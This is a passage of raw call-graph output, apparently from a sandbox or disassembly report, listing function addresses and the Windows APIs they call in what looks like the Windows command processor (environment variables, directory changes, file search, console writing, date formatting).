16909->16836 16911 7ff6a0e88f89 16910->16911 16912 7ff6a0e88f94 16911->16912 16913 7ff6a0e88fe0 RtlCaptureContext RtlLookupFunctionEntry 16911->16913 16912->16822 16914 7ff6a0e89025 RtlVirtualUnwind 16913->16914 16915 7ff6a0e89067 16913->16915 16914->16915 17034 7ff6a0e88fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16915->17034 17035 7ff6a0e96874 GetProcessHeap HeapAlloc 16918->17035 16921 7ff6a0e9676e 17038 7ff6a0e95770 16921->17038 16922 7ff6a0e9674b 16923 7ff6a0e96d1c 14 API calls 16922->16923 16925 7ff6a0e95667 16923->16925 16925->16853 16925->16855 16927 7ff6a0e967c1 memset memset 16930 7ff6a0e967b5 16927->16930 16928 7ff6a0e9679c 16929 7ff6a0e96d1c 14 API calls 16928->16929 16929->16930 16931 7ff6a0e95740 16 API calls 16930->16931 16932 7ff6a0e96836 16930->16932 16931->16932 16933 7ff6a0e95740 16 API calls 16932->16933 16934 7ff6a0e96843 16932->16934 16933->16934 16934->16925 17059 7ff6a0e95a38 GetProcessHeap RtlFreeHeap 16934->17059 16937 7ff6a0e836b7 16936->16937 16937->16857 16939 7ff6a0e95e8f 16938->16939 16940 7ff6a0e95ebf 16938->16940 16942 7ff6a0e96c5c 16939->16942 16940->16836 16945 7ff6a0e96a34 16942->16945 16946 7ff6a0e96a41 16945->16946 16953 7ff6a0e963fc 16946->16953 16949 7ff6a0e96b1d 16950 7ff6a0e88f80 7 API calls 16949->16950 16952 7ff6a0e96b2e 16950->16952 16952->16940 16954 7ff6a0e96455 16953->16954 16955 7ff6a0e96461 16953->16955 16954->16955 16956 7ff6a0e96c5c 11 API calls 16954->16956 16957 7ff6a0e964f9 GetCurrentThreadId 16955->16957 16956->16955 16958 7ff6a0e96561 16957->16958 16959 7ff6a0e965ea 16958->16959 16960 7ff6a0e965f5 IsDebuggerPresent 16958->16960 16961 7ff6a0e9666c OutputDebugStringW 16959->16961 16963 7ff6a0e9660b 16959->16963 16968 7ff6a0e95bf4 16959->16968 16960->16959 16961->16963 16963->16949 16964 7ff6a0e9742c 16963->16964 16965 7ff6a0e97444 16964->16965 16966 7ff6a0e9744a memset 16964->16966 16965->16966 16967 7ff6a0e97489 16966->16967 16972 7ff6a0e95c2e 16968->16972 16996 7ff6a0e95e13 16968->16996 16969 7ff6a0e88f80 7 API calls 16970 7ff6a0e95e49 16969->16970 16970->16961 16971 7ff6a0e95ca7 FormatMessageW 16973 7ff6a0e95d1f 16971->16973 16974 7ff6a0e95cfc 16971->16974 16972->16971 16972->16996 16976 7ff6a0e966bc _vsnwprintf 16973->16976 16997 7ff6a0e966bc 16974->16997 16977 7ff6a0e95d1d 16976->16977 16978 7ff6a0e95d54 GetCurrentThreadId 16977->16978 16980 7ff6a0e966bc _vsnwprintf 16977->16980 16979 7ff6a0e966bc _vsnwprintf 16978->16979 16981 7ff6a0e95d91 16979->16981 16982 7ff6a0e95d51 16980->16982 16983 7ff6a0e966bc _vsnwprintf 16981->16983 16981->16996 16982->16978 16984 7ff6a0e95db9 16983->16984 16985 7ff6a0e95dd4 16984->16985 16986 7ff6a0e966bc _vsnwprintf 16984->16986 16987 7ff6a0e95def 16985->16987 16988 7ff6a0e966bc _vsnwprintf 16985->16988 16986->16985 16989 7ff6a0e95dff 16987->16989 16990 7ff6a0e95e15 16987->16990 16988->16987 16993 7ff6a0e966bc _vsnwprintf 16989->16993 16991 7ff6a0e95e2b 16990->16991 16992 7ff6a0e95e1d 16990->16992 16995 7ff6a0e966bc _vsnwprintf 16991->16995 16994 7ff6a0e966bc _vsnwprintf 16992->16994 16993->16996 16994->16996 16995->16996 16996->16969 16998 7ff6a0e8363c _vsnwprintf 16997->16998 16999 7ff6a0e966e2 16998->16999 16999->16977 16999->16999 17001 7ff6a0e96c5c 14 API calls 17000->17001 17002 7ff6a0e95a2c 17001->17002 17002->16870 17021 7ff6a0e96bd0 17003->17021 17007 7ff6a0e9629f 17006->17007 17008 7ff6a0e962b3 17006->17008 17009 7ff6a0e96cfc 15 API calls 17007->17009 17010 7ff6a0e96334 ReleaseSemaphore 17008->17010 17011 7ff6a0e962d9 ReleaseSemaphore 17008->17011 17020 7ff6a0e962be 17008->17020 17013 7ff6a0e962ae 17009->17013 17010->17007 17012 7ff6a0e96358 17010->17012 17011->17007 17014 7ff6a0e962f5 ReleaseSemaphore 17011->17014 17015 7ff6a0e96366 ReleaseSemaphore 17012->17015 17012->17020 17013->16882 17013->16887 17017 7ff6a0e96313 GetLastError 17014->17017 17014->17020 17018 7ff6a0e96380 GetLastError 17015->17018 17015->17020 17016 7ff6a0e96d1c 14 API calls 17016->17013 17017->17013 17017->17020 17019 7ff6a0e96393 WaitForSingleObject 17018->17019 17018->17020 17019->17020 17020->17013 17020->17016 17022 7ff6a0e95e68 15 API calls 17021->17022 17023 7ff6a0e96c01 17022->17023 17024 7ff6a0e96a34 14 API calls 17023->17024 17025 7ff6a0e96c3b 17024->17025 17025->16898 17029 7ff6a0e96b40 17026->17029 17030 7ff6a0e95e68 15 API calls 17029->17030 17031 7ff6a0e96b71 17030->17031 17032 7ff6a0e96a34 14 API calls 17031->17032 17033 7ff6a0e96baf 17032->17033 17033->16903 17036 7ff6a0e9673e 17035->17036 17037 7ff6a0e968b0 GetProcessHeap 17035->17037 17036->16921 17036->16922 17037->17036 17039 7ff6a0e957aa 17038->17039 17040 7ff6a0e9584a CreateSemaphoreExW 17039->17040 17041 7ff6a0e95895 17040->17041 17042 7ff6a0e95885 17040->17042 17044 7ff6a0e95edc 15 API calls 17041->17044 17043 7ff6a0e9758c 18 API calls 17042->17043 17045 7ff6a0e95890 17043->17045 17044->17045 17046 7ff6a0e958a0 17045->17046 17054 7ff6a0e958c3 CreateSemaphoreExW 17045->17054 17047 7ff6a0e96d1c 14 API calls 17046->17047 17048 7ff6a0e958bc 17047->17048 17049 7ff6a0e88f80 7 API calls 17048->17049 17050 7ff6a0e959bd 17049->17050 17050->16927 17050->16928 17052 7ff6a0e9596f 17055 7ff6a0e9758c 18 API calls 17052->17055 17053 7ff6a0e95980 17056 7ff6a0e95edc 15 API calls 17053->17056 17054->17052 17054->17053 17057 7ff6a0e9597b 17055->17057 17056->17057 17057->17048 17058 7ff6a0e96d1c 14 API calls 17057->17058 17058->17048 17061 7ff6a0e96ea6 17060->17061 17062 7ff6a0e96f0c 17061->17062 17063 7ff6a0e96874 3 API calls 17061->17063 17065 7ff6a0e96f5f 17062->17065 17073 7ff6a0e952f0 17062->17073 17064 7ff6a0e96edb 17063->17064 17064->17062 17066 7ff6a0e96ee3 GetProcessHeap RtlFreeHeap 17064->17066 17065->16811 17066->17062 17069 7ff6a0e952f0 memcpy_s 17070 7ff6a0e96f3d 17069->17070 17077 7ff6a0e9536c 17070->17077 17074 7ff6a0e9530a 17073->17074 17076 7ff6a0e9533f 17073->17076 17075 7ff6a0e95328 memcpy_s 17074->17075 17074->17076 17075->17076 17076->17069 17078 7ff6a0e95390 17077->17078 17079 7ff6a0e953c8 memset 17077->17079 17078->17079 17080 7ff6a0e953ae memcpy_s 17078->17080 17079->17065 17080->17079 17083 7ff6a0e9be30 17097 7ff6a0e7d3f0 17083->17097 17086 7ff6a0e9be70 17090 7ff6a0e9be8e _wcsicmp 17086->17090 17091 7ff6a0e9be84 17086->17091 17087 7ff6a0e9be52 17125 7ff6a0e73240 17087->17125 17089 7ff6a0e9be6b 17092 7ff6a0e9bea8 17090->17092 17093 7ff6a0e9bebb _wcsicmp 17090->17093 17133 7ff6a0e73278 17091->17133 17128 7ff6a0e8498c 17092->17128 17093->17092 17094 7ff6a0e9bef0 _wcsicmp 17093->17094 17094->17089 17094->17091 17098 7ff6a0e7d810 17097->17098 17099 7ff6a0e7d420 17097->17099 17136 7ff6a0e7b998 17098->17136 17101 7ff6a0e8caad 17099->17101 17102 7ff6a0e7d46e GetProcessHeap HeapAlloc 17099->17102 17103 7ff6a0e73278 166 API calls 17101->17103 17102->17101 17108 7ff6a0e7d49a 17102->17108 17104 7ff6a0e8cab7 17103->17104 17107 7ff6a0e7d515 17117 7ff6a0e7d544 17107->17117 17108->17107 17109 7ff6a0e7d4e8 wcschr 17108->17109 17108->17117 17109->17108 17110 7ff6a0e8ca31 wcschr 17110->17117 17111 7ff6a0e7d54a iswspace 17113 7ff6a0e7d561 wcschr 17111->17113 17111->17117 17112 7ff6a0e7d5ee GetProcessHeap HeapReAlloc 17112->17101 17116 7ff6a0e7d61d GetProcessHeap HeapSize 17112->17116 17113->17117 17114 7ff6a0e7d586 wcschr 17114->17117 17115 7ff6a0e7d6ff iswspace 17115->17117 17118 7ff6a0e7d712 wcschr 17115->17118 17116->17117 17117->17101 17117->17110 17117->17111 17117->17112 17117->17114 17117->17115 17119 7ff6a0e7d668 17117->17119 17120 7ff6a0e7d759 wcschr 17117->17120 17122 7ff6a0e7d6c5 wcschr 17117->17122 17123 7ff6a0e8ca5a wcschr 17117->17123 17165 7ff6a0e89158 RtlCaptureContext RtlLookupFunctionEntry 17117->17165 17170 7ff6a0e9e91c 17117->17170 17118->17117 17121 7ff6a0e88f80 7 API calls 17119->17121 17120->17117 17124 7ff6a0e7d6a0 17121->17124 17122->17117 17123->17117 17124->17086 17124->17087 17531 7ff6a0e732b0 17125->17531 17129 7ff6a0e849ba SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 17128->17129 17130 7ff6a0e849a4 17128->17130 17131 7ff6a0e84a14 5 API calls 17129->17131 17130->17129 17132 7ff6a0e849f1 17131->17132 17132->17089 17134 7ff6a0e732b0 166 API calls 17133->17134 17135 7ff6a0e732a4 17134->17135 17135->17089 17173 7ff6a0e7cd90 17136->17173 17139 7ff6a0e7b9a6 17139->17107 17140 7ff6a0e9e91c 198 API calls 17141 7ff6a0e7b9b1 memset 17140->17141 17179 7ff6a0e7ca40 17141->17179 17144 7ff6a0e8c3a8 17145 7ff6a0e7b998 199 API calls 17144->17145 17154 7ff6a0e8c41a 17145->17154 17146 7ff6a0e7badb 17146->17144 17149 7ff6a0e7bcef GetFileAttributesW 17146->17149 17151 7ff6a0e7bb05 17146->17151 17147 7ff6a0e7ba4c 17147->17144 17147->17146 17148 7ff6a0e7ba80 wcschr 17147->17148 17150 7ff6a0e7baa0 wcschr 17147->17150 17147->17151 17155 7ff6a0e7bb47 17147->17155 17148->17146 17148->17147 17149->17151 17150->17147 17153 7ff6a0e7bb29 _wcsicmp 17151->17153 17151->17155 17153->17151 17155->17144 17157 7ff6a0e7bb6b 17155->17157 17190 7ff6a0e788a8 17155->17190 17156 7ff6a0e7bc82 iswspace 17156->17157 17159 7ff6a0e7bc99 wcschr 17156->17159 17157->17144 17158 7ff6a0e7bb92 17157->17158 17160 7ff6a0e7bbe2 ??_V@YAXPEAX 17158->17160 17161 7ff6a0e7bbee 17158->17161 17159->17157 17162 7ff6a0e7bc46 17159->17162 17160->17161 17163 7ff6a0e88f80 7 API calls 17161->17163 17162->17144 17162->17156 17162->17157 17164 7ff6a0e7bc01 17163->17164 17164->17107 17166 7ff6a0e89195 RtlVirtualUnwind 17165->17166 17167 7ff6a0e891d7 17165->17167 17166->17167 17203 7ff6a0e88fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17167->17203 17204 7ff6a0e9e9b4 17170->17204 17174 7ff6a0e8c84e 17173->17174 17175 7ff6a0e7cda1 GetProcessHeap HeapAlloc 17173->17175 17177 7ff6a0e73278 164 API calls 17174->17177 17175->17174 17176 7ff6a0e7b9a1 17175->17176 17176->17139 17176->17140 17178 7ff6a0e8c858 17177->17178 17180 7ff6a0e7ca59 17179->17180 17181 7ff6a0e7cab8 17179->17181 17194 7ff6a0e89324 17180->17194 17181->17147 17184 7ff6a0e8c6e0 17186 7ff6a0e96d1c 14 API calls 17184->17186 17185 7ff6a0e7ca84 17187 7ff6a0e7ca9b memset 17185->17187 17188 7ff6a0e8c706 ??_V@YAXPEAX 17185->17188 17186->17181 17187->17181 17191 7ff6a0e788fc 17190->17191 17192 7ff6a0e788cf 17190->17192 17191->17162 17192->17191 17193 7ff6a0e788df _wcsicmp 17192->17193 17193->17192 17195 7ff6a0e89330 17194->17195 17198 7ff6a0e89a6c 17195->17198 17197 7ff6a0e7ca7b 17197->17184 17197->17185 17199 7ff6a0e89a86 malloc 17198->17199 17200 7ff6a0e89a91 17199->17200 17201 7ff6a0e89a77 17199->17201 17200->17197 17201->17199 17202 7ff6a0e89a97 Concurrency::cancel_current_task 17201->17202 17202->17197 17206 7ff6a0e9ea0f 17204->17206 17207 7ff6a0e9e9d9 17204->17207 17205 7ff6a0e9ea67 17234 7ff6a0e9c978 17205->17234 17206->17205 17229 7ff6a0e7af98 17206->17229 17216 7ff6a0e76a48 17207->17216 17211 7ff6a0e9eaae 17213 7ff6a0e9eacf 17211->17213 17249 7ff6a0e83a0c 17211->17249 17212 7ff6a0e9ea6c 17212->17211 17244 7ff6a0e7d208 17212->17244 17217 7ff6a0e76b23 17216->17217 17218 7ff6a0e76a51 17216->17218 17217->17206 17218->17217 17219 7ff6a0e9417c 17218->17219 17220 7ff6a0e76ab2 17218->17220 17324 7ff6a0e9ec14 memset 17219->17324 17255 7ff6a0e83c24 17220->17255 17231 7ff6a0e7afb1 17229->17231 17230 7ff6a0e7afdb 17230->17206 17231->17230 17233 7ff6a0e7d208 _close 17231->17233 17529 7ff6a0e7b038 _dup2 17231->17529 17233->17231 17235 7ff6a0e9ca9e 17234->17235 17236 7ff6a0e9c98e 17234->17236 17235->17212 17237 7ff6a0e9ee4c TerminateProcess GetLastError 17236->17237 17243 7ff6a0e9c9b3 17236->17243 17237->17236 17238 7ff6a0e85cb4 7 API calls 17238->17243 17239 7ff6a0e9ca21 _get_osfhandle FlushFileBuffers 17241 7ff6a0e7b038 _dup2 17239->17241 17240 7ff6a0e7d208 _close 17240->17243 17241->17243 17242 7ff6a0e7b038 _dup2 17242->17243 17243->17235 17243->17238 17243->17239 17243->17240 17243->17242 17245 7ff6a0e7d246 17244->17245 17246 7ff6a0e7d211 17244->17246 17245->17212 17247 7ff6a0e7d238 _close 17246->17247 17248 7ff6a0e8ca0e 17246->17248 17247->17245 17248->17212 17250 7ff6a0e83a53 FindClose 17249->17250 17253 7ff6a0e83a25 17249->17253 17251 7ff6a0e83a74 GetLastError 17250->17251 17252 7ff6a0e83a66 17250->17252 17251->17252 17252->17211 17253->17250 17254 7ff6a0e8ec38 17253->17254 17256 7ff6a0e83c67 17255->17256 17257 7ff6a0e8412c 17256->17257 17258 7ff6a0e7ca40 17 API calls 17256->17258 17259 7ff6a0e88f80 7 API calls 17257->17259 17260 7ff6a0e83c94 17258->17260 17261 7ff6a0e76abf GetProcessHeap RtlFreeHeap 17259->17261 17262 7ff6a0e8ec97 17260->17262 17345 7ff6a0e7b900 17260->17345 17320 7ff6a0e76b84 SetEnvironmentStringsW GetProcessHeap RtlFreeHeap 17261->17320 17263 7ff6a0e8855c ??_V@YAXPEAX 17262->17263 17265 7ff6a0e8eca1 17263->17265 17267 7ff6a0e83cb8 GetCurrentDirectoryW towupper iswalpha 17269 7ff6a0e83fb8 17267->17269 17270 7ff6a0e83d68 17267->17270 17272 7ff6a0e83fc6 GetLastError 17269->17272 17270->17269 17271 7ff6a0e83d72 towupper GetFullPathNameW 17270->17271 17271->17272 17273 7ff6a0e83dd3 17271->17273 17371 7ff6a0e8855c 17272->17371 17275 7ff6a0e83fe0 17273->17275 17292 7ff6a0e83de3 17273->17292 17277 7ff6a0e8855c ??_V@YAXPEAX 17275->17277 17276 7ff6a0e840fe 17278 7ff6a0e8855c ??_V@YAXPEAX 17276->17278 17279 7ff6a0e83ffb _local_unwind 17277->17279 17280 7ff6a0e84108 _local_unwind 17278->17280 17281 7ff6a0e8400c GetLastError 17279->17281 17282 7ff6a0e83f98 17280->17282 17283 7ff6a0e84028 17281->17283 17284 7ff6a0e83e95 17281->17284 17374 7ff6a0e7ff70 17282->17374 17283->17284 17287 7ff6a0e84031 17283->17287 17285 7ff6a0e83ecf 17284->17285 17349 7ff6a0e82978 17284->17349 17289 7ff6a0e83f08 17285->17289 17290 7ff6a0e83ed5 GetFileAttributesW 17285->17290 17294 7ff6a0e8855c ??_V@YAXPEAX 17287->17294 17300 7ff6a0e83f1e SetCurrentDirectoryW 17289->17300 17304 7ff6a0e83f46 17289->17304 17297 7ff6a0e83efd 17290->17297 17298 7ff6a0e84067 GetLastError 17290->17298 17292->17276 17293 7ff6a0e83e66 GetFileAttributesW 17292->17293 17293->17281 17293->17284 17295 7ff6a0e8403b _local_unwind 17294->17295 17301 7ff6a0e8404c 17295->17301 17296 7ff6a0e83ec7 17296->17285 17296->17301 17297->17289 17303 7ff6a0e8409d 17297->17303 17302 7ff6a0e8855c ??_V@YAXPEAX 17298->17302 17299 7ff6a0e8855c ??_V@YAXPEAX 17299->17257 17300->17304 17305 7ff6a0e840b8 GetLastError 17300->17305 17306 7ff6a0e8855c ??_V@YAXPEAX 17301->17306 17307 7ff6a0e8408c _local_unwind 17302->17307 17308 7ff6a0e8855c ??_V@YAXPEAX 17303->17308 17310 7ff6a0e8498c 8 API calls 17304->17310 17309 7ff6a0e8855c ??_V@YAXPEAX 17305->17309 17311 7ff6a0e84056 _local_unwind 17306->17311 17307->17303 17312 7ff6a0e840a7 _local_unwind 17308->17312 17313 7ff6a0e840d2 _local_unwind 17309->17313 17314 7ff6a0e83f67 17310->17314 17311->17298 17312->17305 17315 7ff6a0e840e3 17313->17315 17314->17315 17316 7ff6a0e83f6f 17314->17316 17317 7ff6a0e8855c ??_V@YAXPEAX 17315->17317 17362 7ff6a0e8417c 17316->17362 17319 7ff6a0e840ed _local_unwind 17317->17319 17319->17276 17523 7ff6a0e84a14 GetEnvironmentStringsW 17320->17523 17323 7ff6a0e76b30 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 17325 7ff6a0e7ca40 17 API calls 17324->17325 17326 7ff6a0e9ec96 17325->17326 17327 7ff6a0e9edf7 17326->17327 17330 7ff6a0e8081c 166 API calls 17326->17330 17328 7ff6a0e9ee16 17327->17328 17329 7ff6a0e9ee0a ??_V@YAXPEAX 17327->17329 17331 7ff6a0e88f80 7 API calls 17328->17331 17329->17328 17332 7ff6a0e9ecca 17330->17332 17333 7ff6a0e94190 17331->17333 17334 7ff6a0e9ecd2 SetCurrentDirectoryW 17332->17334 17335 7ff6a0e9ecfb 17332->17335 17336 7ff6a0e9edd4 17334->17336 17337 7ff6a0e9ece9 SetErrorMode 17334->17337 17338 7ff6a0e8498c 8 API calls 17335->17338 17339 7ff6a0e8417c 166 API calls 17336->17339 17337->17335 17340 7ff6a0e9ed89 SetCurrentDirectoryW 17338->17340 17339->17327 17341 7ff6a0e9edc1 17340->17341 17342 7ff6a0e9edac GetLastError 17340->17342 17341->17336 17344 7ff6a0e9edc6 SetErrorMode 17341->17344 17343 7ff6a0e73278 166 API calls 17342->17343 17343->17341 17344->17336 17346 7ff6a0e7b914 17345->17346 17346->17346 17347 7ff6a0e7cd90 166 API calls 17346->17347 17348 7ff6a0e7b92a 17347->17348 17348->17262 17348->17267 17350 7ff6a0e829b9 17349->17350 17350->17350 17351 7ff6a0e82a1e FindFirstFileW 17350->17351 17352 7ff6a0e8e3f7 17350->17352 17354 7ff6a0e829ed 17350->17354 17356 7ff6a0e82aeb _wcsnicmp 17350->17356 17358 7ff6a0e8e3d6 _wcsicmp 17350->17358 17359 7ff6a0e82a9d memmove 17350->17359 17360 7ff6a0e8e404 memmove 17350->17360 17351->17352 17353 7ff6a0e82a44 FindClose 17351->17353 17352->17296 17353->17350 17355 7ff6a0e88f80 7 API calls 17354->17355 17357 7ff6a0e82a02 17355->17357 17356->17350 17357->17296 17358->17350 17358->17352 17359->17350 17360->17352 17363 7ff6a0e841a8 GetCurrentDirectoryW 17362->17363 17364 7ff6a0e841d4 towupper 17362->17364 17369 7ff6a0e841b9 17363->17369 17378 7ff6a0e8081c GetEnvironmentVariableW 17364->17378 17366 7ff6a0e88f80 7 API calls 17368 7ff6a0e841c8 17366->17368 17368->17282 17369->17366 17370 7ff6a0e8ecac towupper 17372 7ff6a0e88583 17371->17372 17373 7ff6a0e88574 ??_V@YAXPEAX 17371->17373 17372->17275 17373->17372 17375 7ff6a0e7ffdb 17374->17375 17376 7ff6a0e7ff7c 17374->17376 17375->17299 17376->17375 17377 7ff6a0e7ffb5 GetProcessHeap RtlFreeHeap 17376->17377 17377->17375 17379 7ff6a0e80877 17378->17379 17380 7ff6a0e8085e 17378->17380 17381 7ff6a0e80884 _wcsicmp 17379->17381 17382 7ff6a0e80970 17379->17382 17380->17369 17380->17370 17383 7ff6a0e808a2 _wcsicmp 17381->17383 17386 7ff6a0e80989 17381->17386 17399 7ff6a0e83140 17382->17399 17385 7ff6a0e808c0 _wcsicmp 17383->17385 17383->17386 17384 7ff6a0e8417c 154 API calls 17384->17386 17385->17386 17388 7ff6a0e808de _wcsicmp 17385->17388 17386->17384 17389 7ff6a0e833f0 _vsnwprintf 17386->17389 17395 7ff6a0e89158 7 API calls 17386->17395 17425 7ff6a0e76ee4 17386->17425 17390 7ff6a0e808fc _wcsicmp 17388->17390 17391 7ff6a0e8d8d3 GetCommandLineW 17388->17391 17389->17386 17390->17386 17392 7ff6a0e8091a _wcsicmp 17390->17392 17396 7ff6a0e8d8e5 rand 17391->17396 17392->17382 17393 7ff6a0e80934 _wcsicmp 17392->17393 17393->17396 17397 7ff6a0e80952 _wcsicmp 17393->17397 17395->17386 17396->17386 17397->17382 17398 7ff6a0e8d8f9 GetNumaHighestNodeNumber 17397->17398 17398->17386 17400 7ff6a0e8e59e 17399->17400 17401 7ff6a0e83184 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 17399->17401 17459 7ff6a0e98654 17400->17459 17402 7ff6a0e831e0 17401->17402 17403 7ff6a0e8e5ed 17401->17403 17406 7ff6a0e8e5a8 17402->17406 17407 7ff6a0e831ff 17402->17407 17405 7ff6a0e8e5fe 17403->17405 17414 7ff6a0e8e750 17403->17414 17470 7ff6a0e85508 GetUserDefaultLCID 17405->17470 17465 7ff6a0e83448 17406->17465 17409 7ff6a0e833f0 _vsnwprintf 17407->17409 17412 7ff6a0e83247 17409->17412 17417 7ff6a0e88f80 7 API calls 17412->17417 17413 7ff6a0e8e5e8 17416 7ff6a0e833f0 _vsnwprintf 17414->17416 17415 7ff6a0e8e629 17418 7ff6a0e8e711 17415->17418 17424 7ff6a0e8e6e7 memmove 17415->17424 17419 7ff6a0e8e748 17416->17419 17420 7ff6a0e83266 17417->17420 17421 7ff6a0e85508 GetUserDefaultLCID 17418->17421 17419->17413 17419->17419 17472 7ff6a0e834a0 17419->17472 17420->17386 17422 7ff6a0e8e716 GetTimeFormatW 17421->17422 17422->17419 17424->17415 17426 7ff6a0e76f30 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 17425->17426 17442 7ff6a0e76fbf 17425->17442 17427 7ff6a0e76f90 17426->17427 17436 7ff6a0e942b6 17426->17436 17429 7ff6a0e85508 GetUserDefaultLCID 17427->17429 17428 7ff6a0e98654 9 API calls 17428->17442 17430 7ff6a0e76f97 GetLocaleInfoW 17429->17430 17430->17442 17431 7ff6a0e9433f 17433 7ff6a0e833f0 _vsnwprintf 17431->17433 17432 7ff6a0e94322 realloc 17432->17431 17432->17436 17435 7ff6a0e9437d 17433->17435 17434 7ff6a0e85508 GetUserDefaultLCID 17437 7ff6a0e77042 GetDateFormatW 17434->17437 17450 7ff6a0e943ea 17435->17450 17453 7ff6a0e943fb 17435->17453 17436->17431 17436->17432 17438 7ff6a0e73278 153 API calls 17436->17438 17439 7ff6a0e7707a 17437->17439 17438->17436 17440 7ff6a0e85508 GetUserDefaultLCID 17439->17440 17446 7ff6a0e7708a 17439->17446 17441 7ff6a0e7714a GetDateFormatW 17440->17441 17443 7ff6a0e942a0 GetLastError 17441->17443 17444 7ff6a0e77175 realloc 17441->17444 17442->17428 17442->17434 17442->17442 17445 7ff6a0e9427f memmove 17442->17445 17449 7ff6a0e77020 memmove 17442->17449 17443->17436 17444->17436 17447 7ff6a0e7719c 17444->17447 17445->17442 17446->17435 17456 7ff6a0e770bd 17446->17456 17448 7ff6a0e85508 GetUserDefaultLCID 17447->17448 17451 7ff6a0e771ae GetDateFormatW 17448->17451 17449->17442 17452 7ff6a0e83448 153 API calls 17450->17452 17451->17442 17451->17443 17455 7ff6a0e943f9 17452->17455 17454 7ff6a0e83448 153 API calls 17453->17454 17454->17455 17456->17455 17456->17456 17457 7ff6a0e88f80 7 API calls 17456->17457 17458 7ff6a0e77129 17457->17458 17458->17386 17460 7ff6a0e98673 GetSystemTime 17459->17460 17461 7ff6a0e98686 17459->17461 17462 7ff6a0e986cc SystemTimeToFileTime 17460->17462 17461->17462 17463 7ff6a0e88f80 7 API calls 17462->17463 17464 7ff6a0e986ed 17463->17464 17464->17406 17495 7ff6a0e8363c 17465->17495 17468 7ff6a0e834a0 166 API calls 17469 7ff6a0e83491 17468->17469 17469->17413 17471 7ff6a0e85529 GetLocaleInfoW 17470->17471 17471->17415 17473 7ff6a0e834bf 17472->17473 17494 7ff6a0e834f5 17472->17494 17499 7ff6a0e83578 _get_osfhandle 17473->17499 17476 7ff6a0e8350d AcquireSRWLockShared _get_osfhandle WriteConsoleW 17479 7ff6a0e8e8d2 GetLastError 17476->17479 17480 7ff6a0e83557 ReleaseSRWLockShared 17476->17480 17477 7ff6a0e834cd 17506 7ff6a0e836ec _get_osfhandle 17477->17506 17482 7ff6a0e8e8e5 GetLastError 17479->17482 17481 7ff6a0e834e1 17480->17481 17481->17482 17481->17494 17513 7ff6a0e801b8 _get_osfhandle GetFileType 17482->17513 17485 7ff6a0e8e918 17518 7ff6a0e9f318 _get_osfhandle GetFileType 17485->17518 17486 7ff6a0e8e908 17487 7ff6a0e73278 160 API calls 17486->17487 17487->17494 17489 7ff6a0e8e91f 17490 7ff6a0e8e931 17489->17490 17491 7ff6a0e8e923 17489->17491 17519 7ff6a0e9f1d8 17490->17519 17492 7ff6a0e73278 160 API calls 17491->17492 17492->17494 17494->17413 17496 7ff6a0e83664 17495->17496 17498 7ff6a0e8347b 17495->17498 17497 7ff6a0e83684 _vsnwprintf 17496->17497 17497->17498 17498->17468 17500 7ff6a0e83599 GetFileType 17499->17500 17501 7ff6a0e834c9 17499->17501 17500->17501 17504 7ff6a0e835b1 17500->17504 17501->17476 17501->17477 17502 7ff6a0e8e940 17503 7ff6a0e835c3 GetStdHandle 17505 7ff6a0e835d2 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 17503->17505 17504->17502 17504->17503 17504->17505 17505->17501 17507 7ff6a0e8e95c WriteFile 17506->17507 17512 7ff6a0e83731 17506->17512 17508 7ff6a0e8e980 WideCharToMultiByte WriteFile 17507->17508 17511 7ff6a0e837a1 17508->17511 17508->17512 17509 7ff6a0e83747 17510 7ff6a0e8374b WideCharToMultiByte WriteFile 17509->17510 17509->17511 17510->17511 17511->17481 17512->17508 17512->17509 17512->17511 17514 7ff6a0e801eb 17513->17514 17515 7ff6a0e80200 17513->17515 17514->17485 17514->17486 17515->17514 17516 7ff6a0e80221 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 17515->17516 17517 7ff6a0e80212 GetStdHandle 17515->17517 17516->17514 17517->17516 17518->17489 17520 7ff6a0e9f1e8 17519->17520 17521 7ff6a0e9f220 17520->17521 17522 7ff6a0e73278 166 API calls 17520->17522 17521->17494 17522->17521 17524 7ff6a0e76ae8 17523->17524 17528 7ff6a0e84a40 GetProcessHeap HeapAlloc 17523->17528 17524->17323 17526 7ff6a0e84a91 memmove 17527 7ff6a0e84a9f FreeEnvironmentStringsW 17526->17527 17527->17524 17528->17526 17528->17527 17530 7ff6a0e7b061 17529->17530 17530->17231 17530->17530 17532 7ff6a0e83578 6 API calls 17531->17532 17533 7ff6a0e732e8 17532->17533 17534 7ff6a0e732f0 _get_osfhandle GetConsoleScreenBufferInfo 17533->17534 17535 7ff6a0e7331d 17533->17535 17534->17535 17567 7ff6a0e73410 17535->17567 17537 7ff6a0e733a8 17540 7ff6a0e733b0 17537->17540 17542 7ff6a0e911ff 17537->17542 17538 7ff6a0e836ec 6 API calls 17543 7ff6a0e7333d 17538->17543 17539 7ff6a0e73368 WriteConsoleW 17539->17543 17544 7ff6a0e911cc GetLastError 17539->17544 17545 7ff6a0e88f80 7 API calls 17540->17545 17541 7ff6a0e91057 GetConsoleScreenBufferInfo 17541->17543 17546 7ff6a0e91079 WriteConsoleW 17541->17546 17583 7ff6a0e84c1c 17542->17583 17543->17537 17543->17538 17543->17539 17543->17541 17543->17544 17548 7ff6a0e911df GetLastError 17543->17548 17552 7ff6a0e73400 17543->17552 17544->17543 17549 7ff6a0e7326c 17545->17549 17546->17543 17550 7ff6a0e910a8 9 API calls 17546->17550 17548->17537 17549->17089 17550->17543 17553 7ff6a0e91181 17550->17553 17552->17548 17582 7ff6a0e9bde4 EnterCriticalSection LeaveCriticalSection 17553->17582 17568 7ff6a0e7345c FormatMessageW 17567->17568 17569 7ff6a0e912cd _ultoa GetACP 17567->17569 17568->17569 17577 7ff6a0e7348b 17568->17577 17587 7ff6a0e80460 17569->17587 17572 7ff6a0e7349d wcschr 17573 7ff6a0e734b4 17572->17573 17572->17577 17574 7ff6a0e734c4 FormatMessageW 17573->17574 17575 7ff6a0e9121d GetProcessHeap HeapAlloc 17573->17575 17576 7ff6a0e734ef 17574->17576 17575->17576 17581 7ff6a0e9124f FormatMessageW GetProcessHeap RtlFreeHeap 17575->17581 17578 7ff6a0e88f80 7 API calls 17576->17578 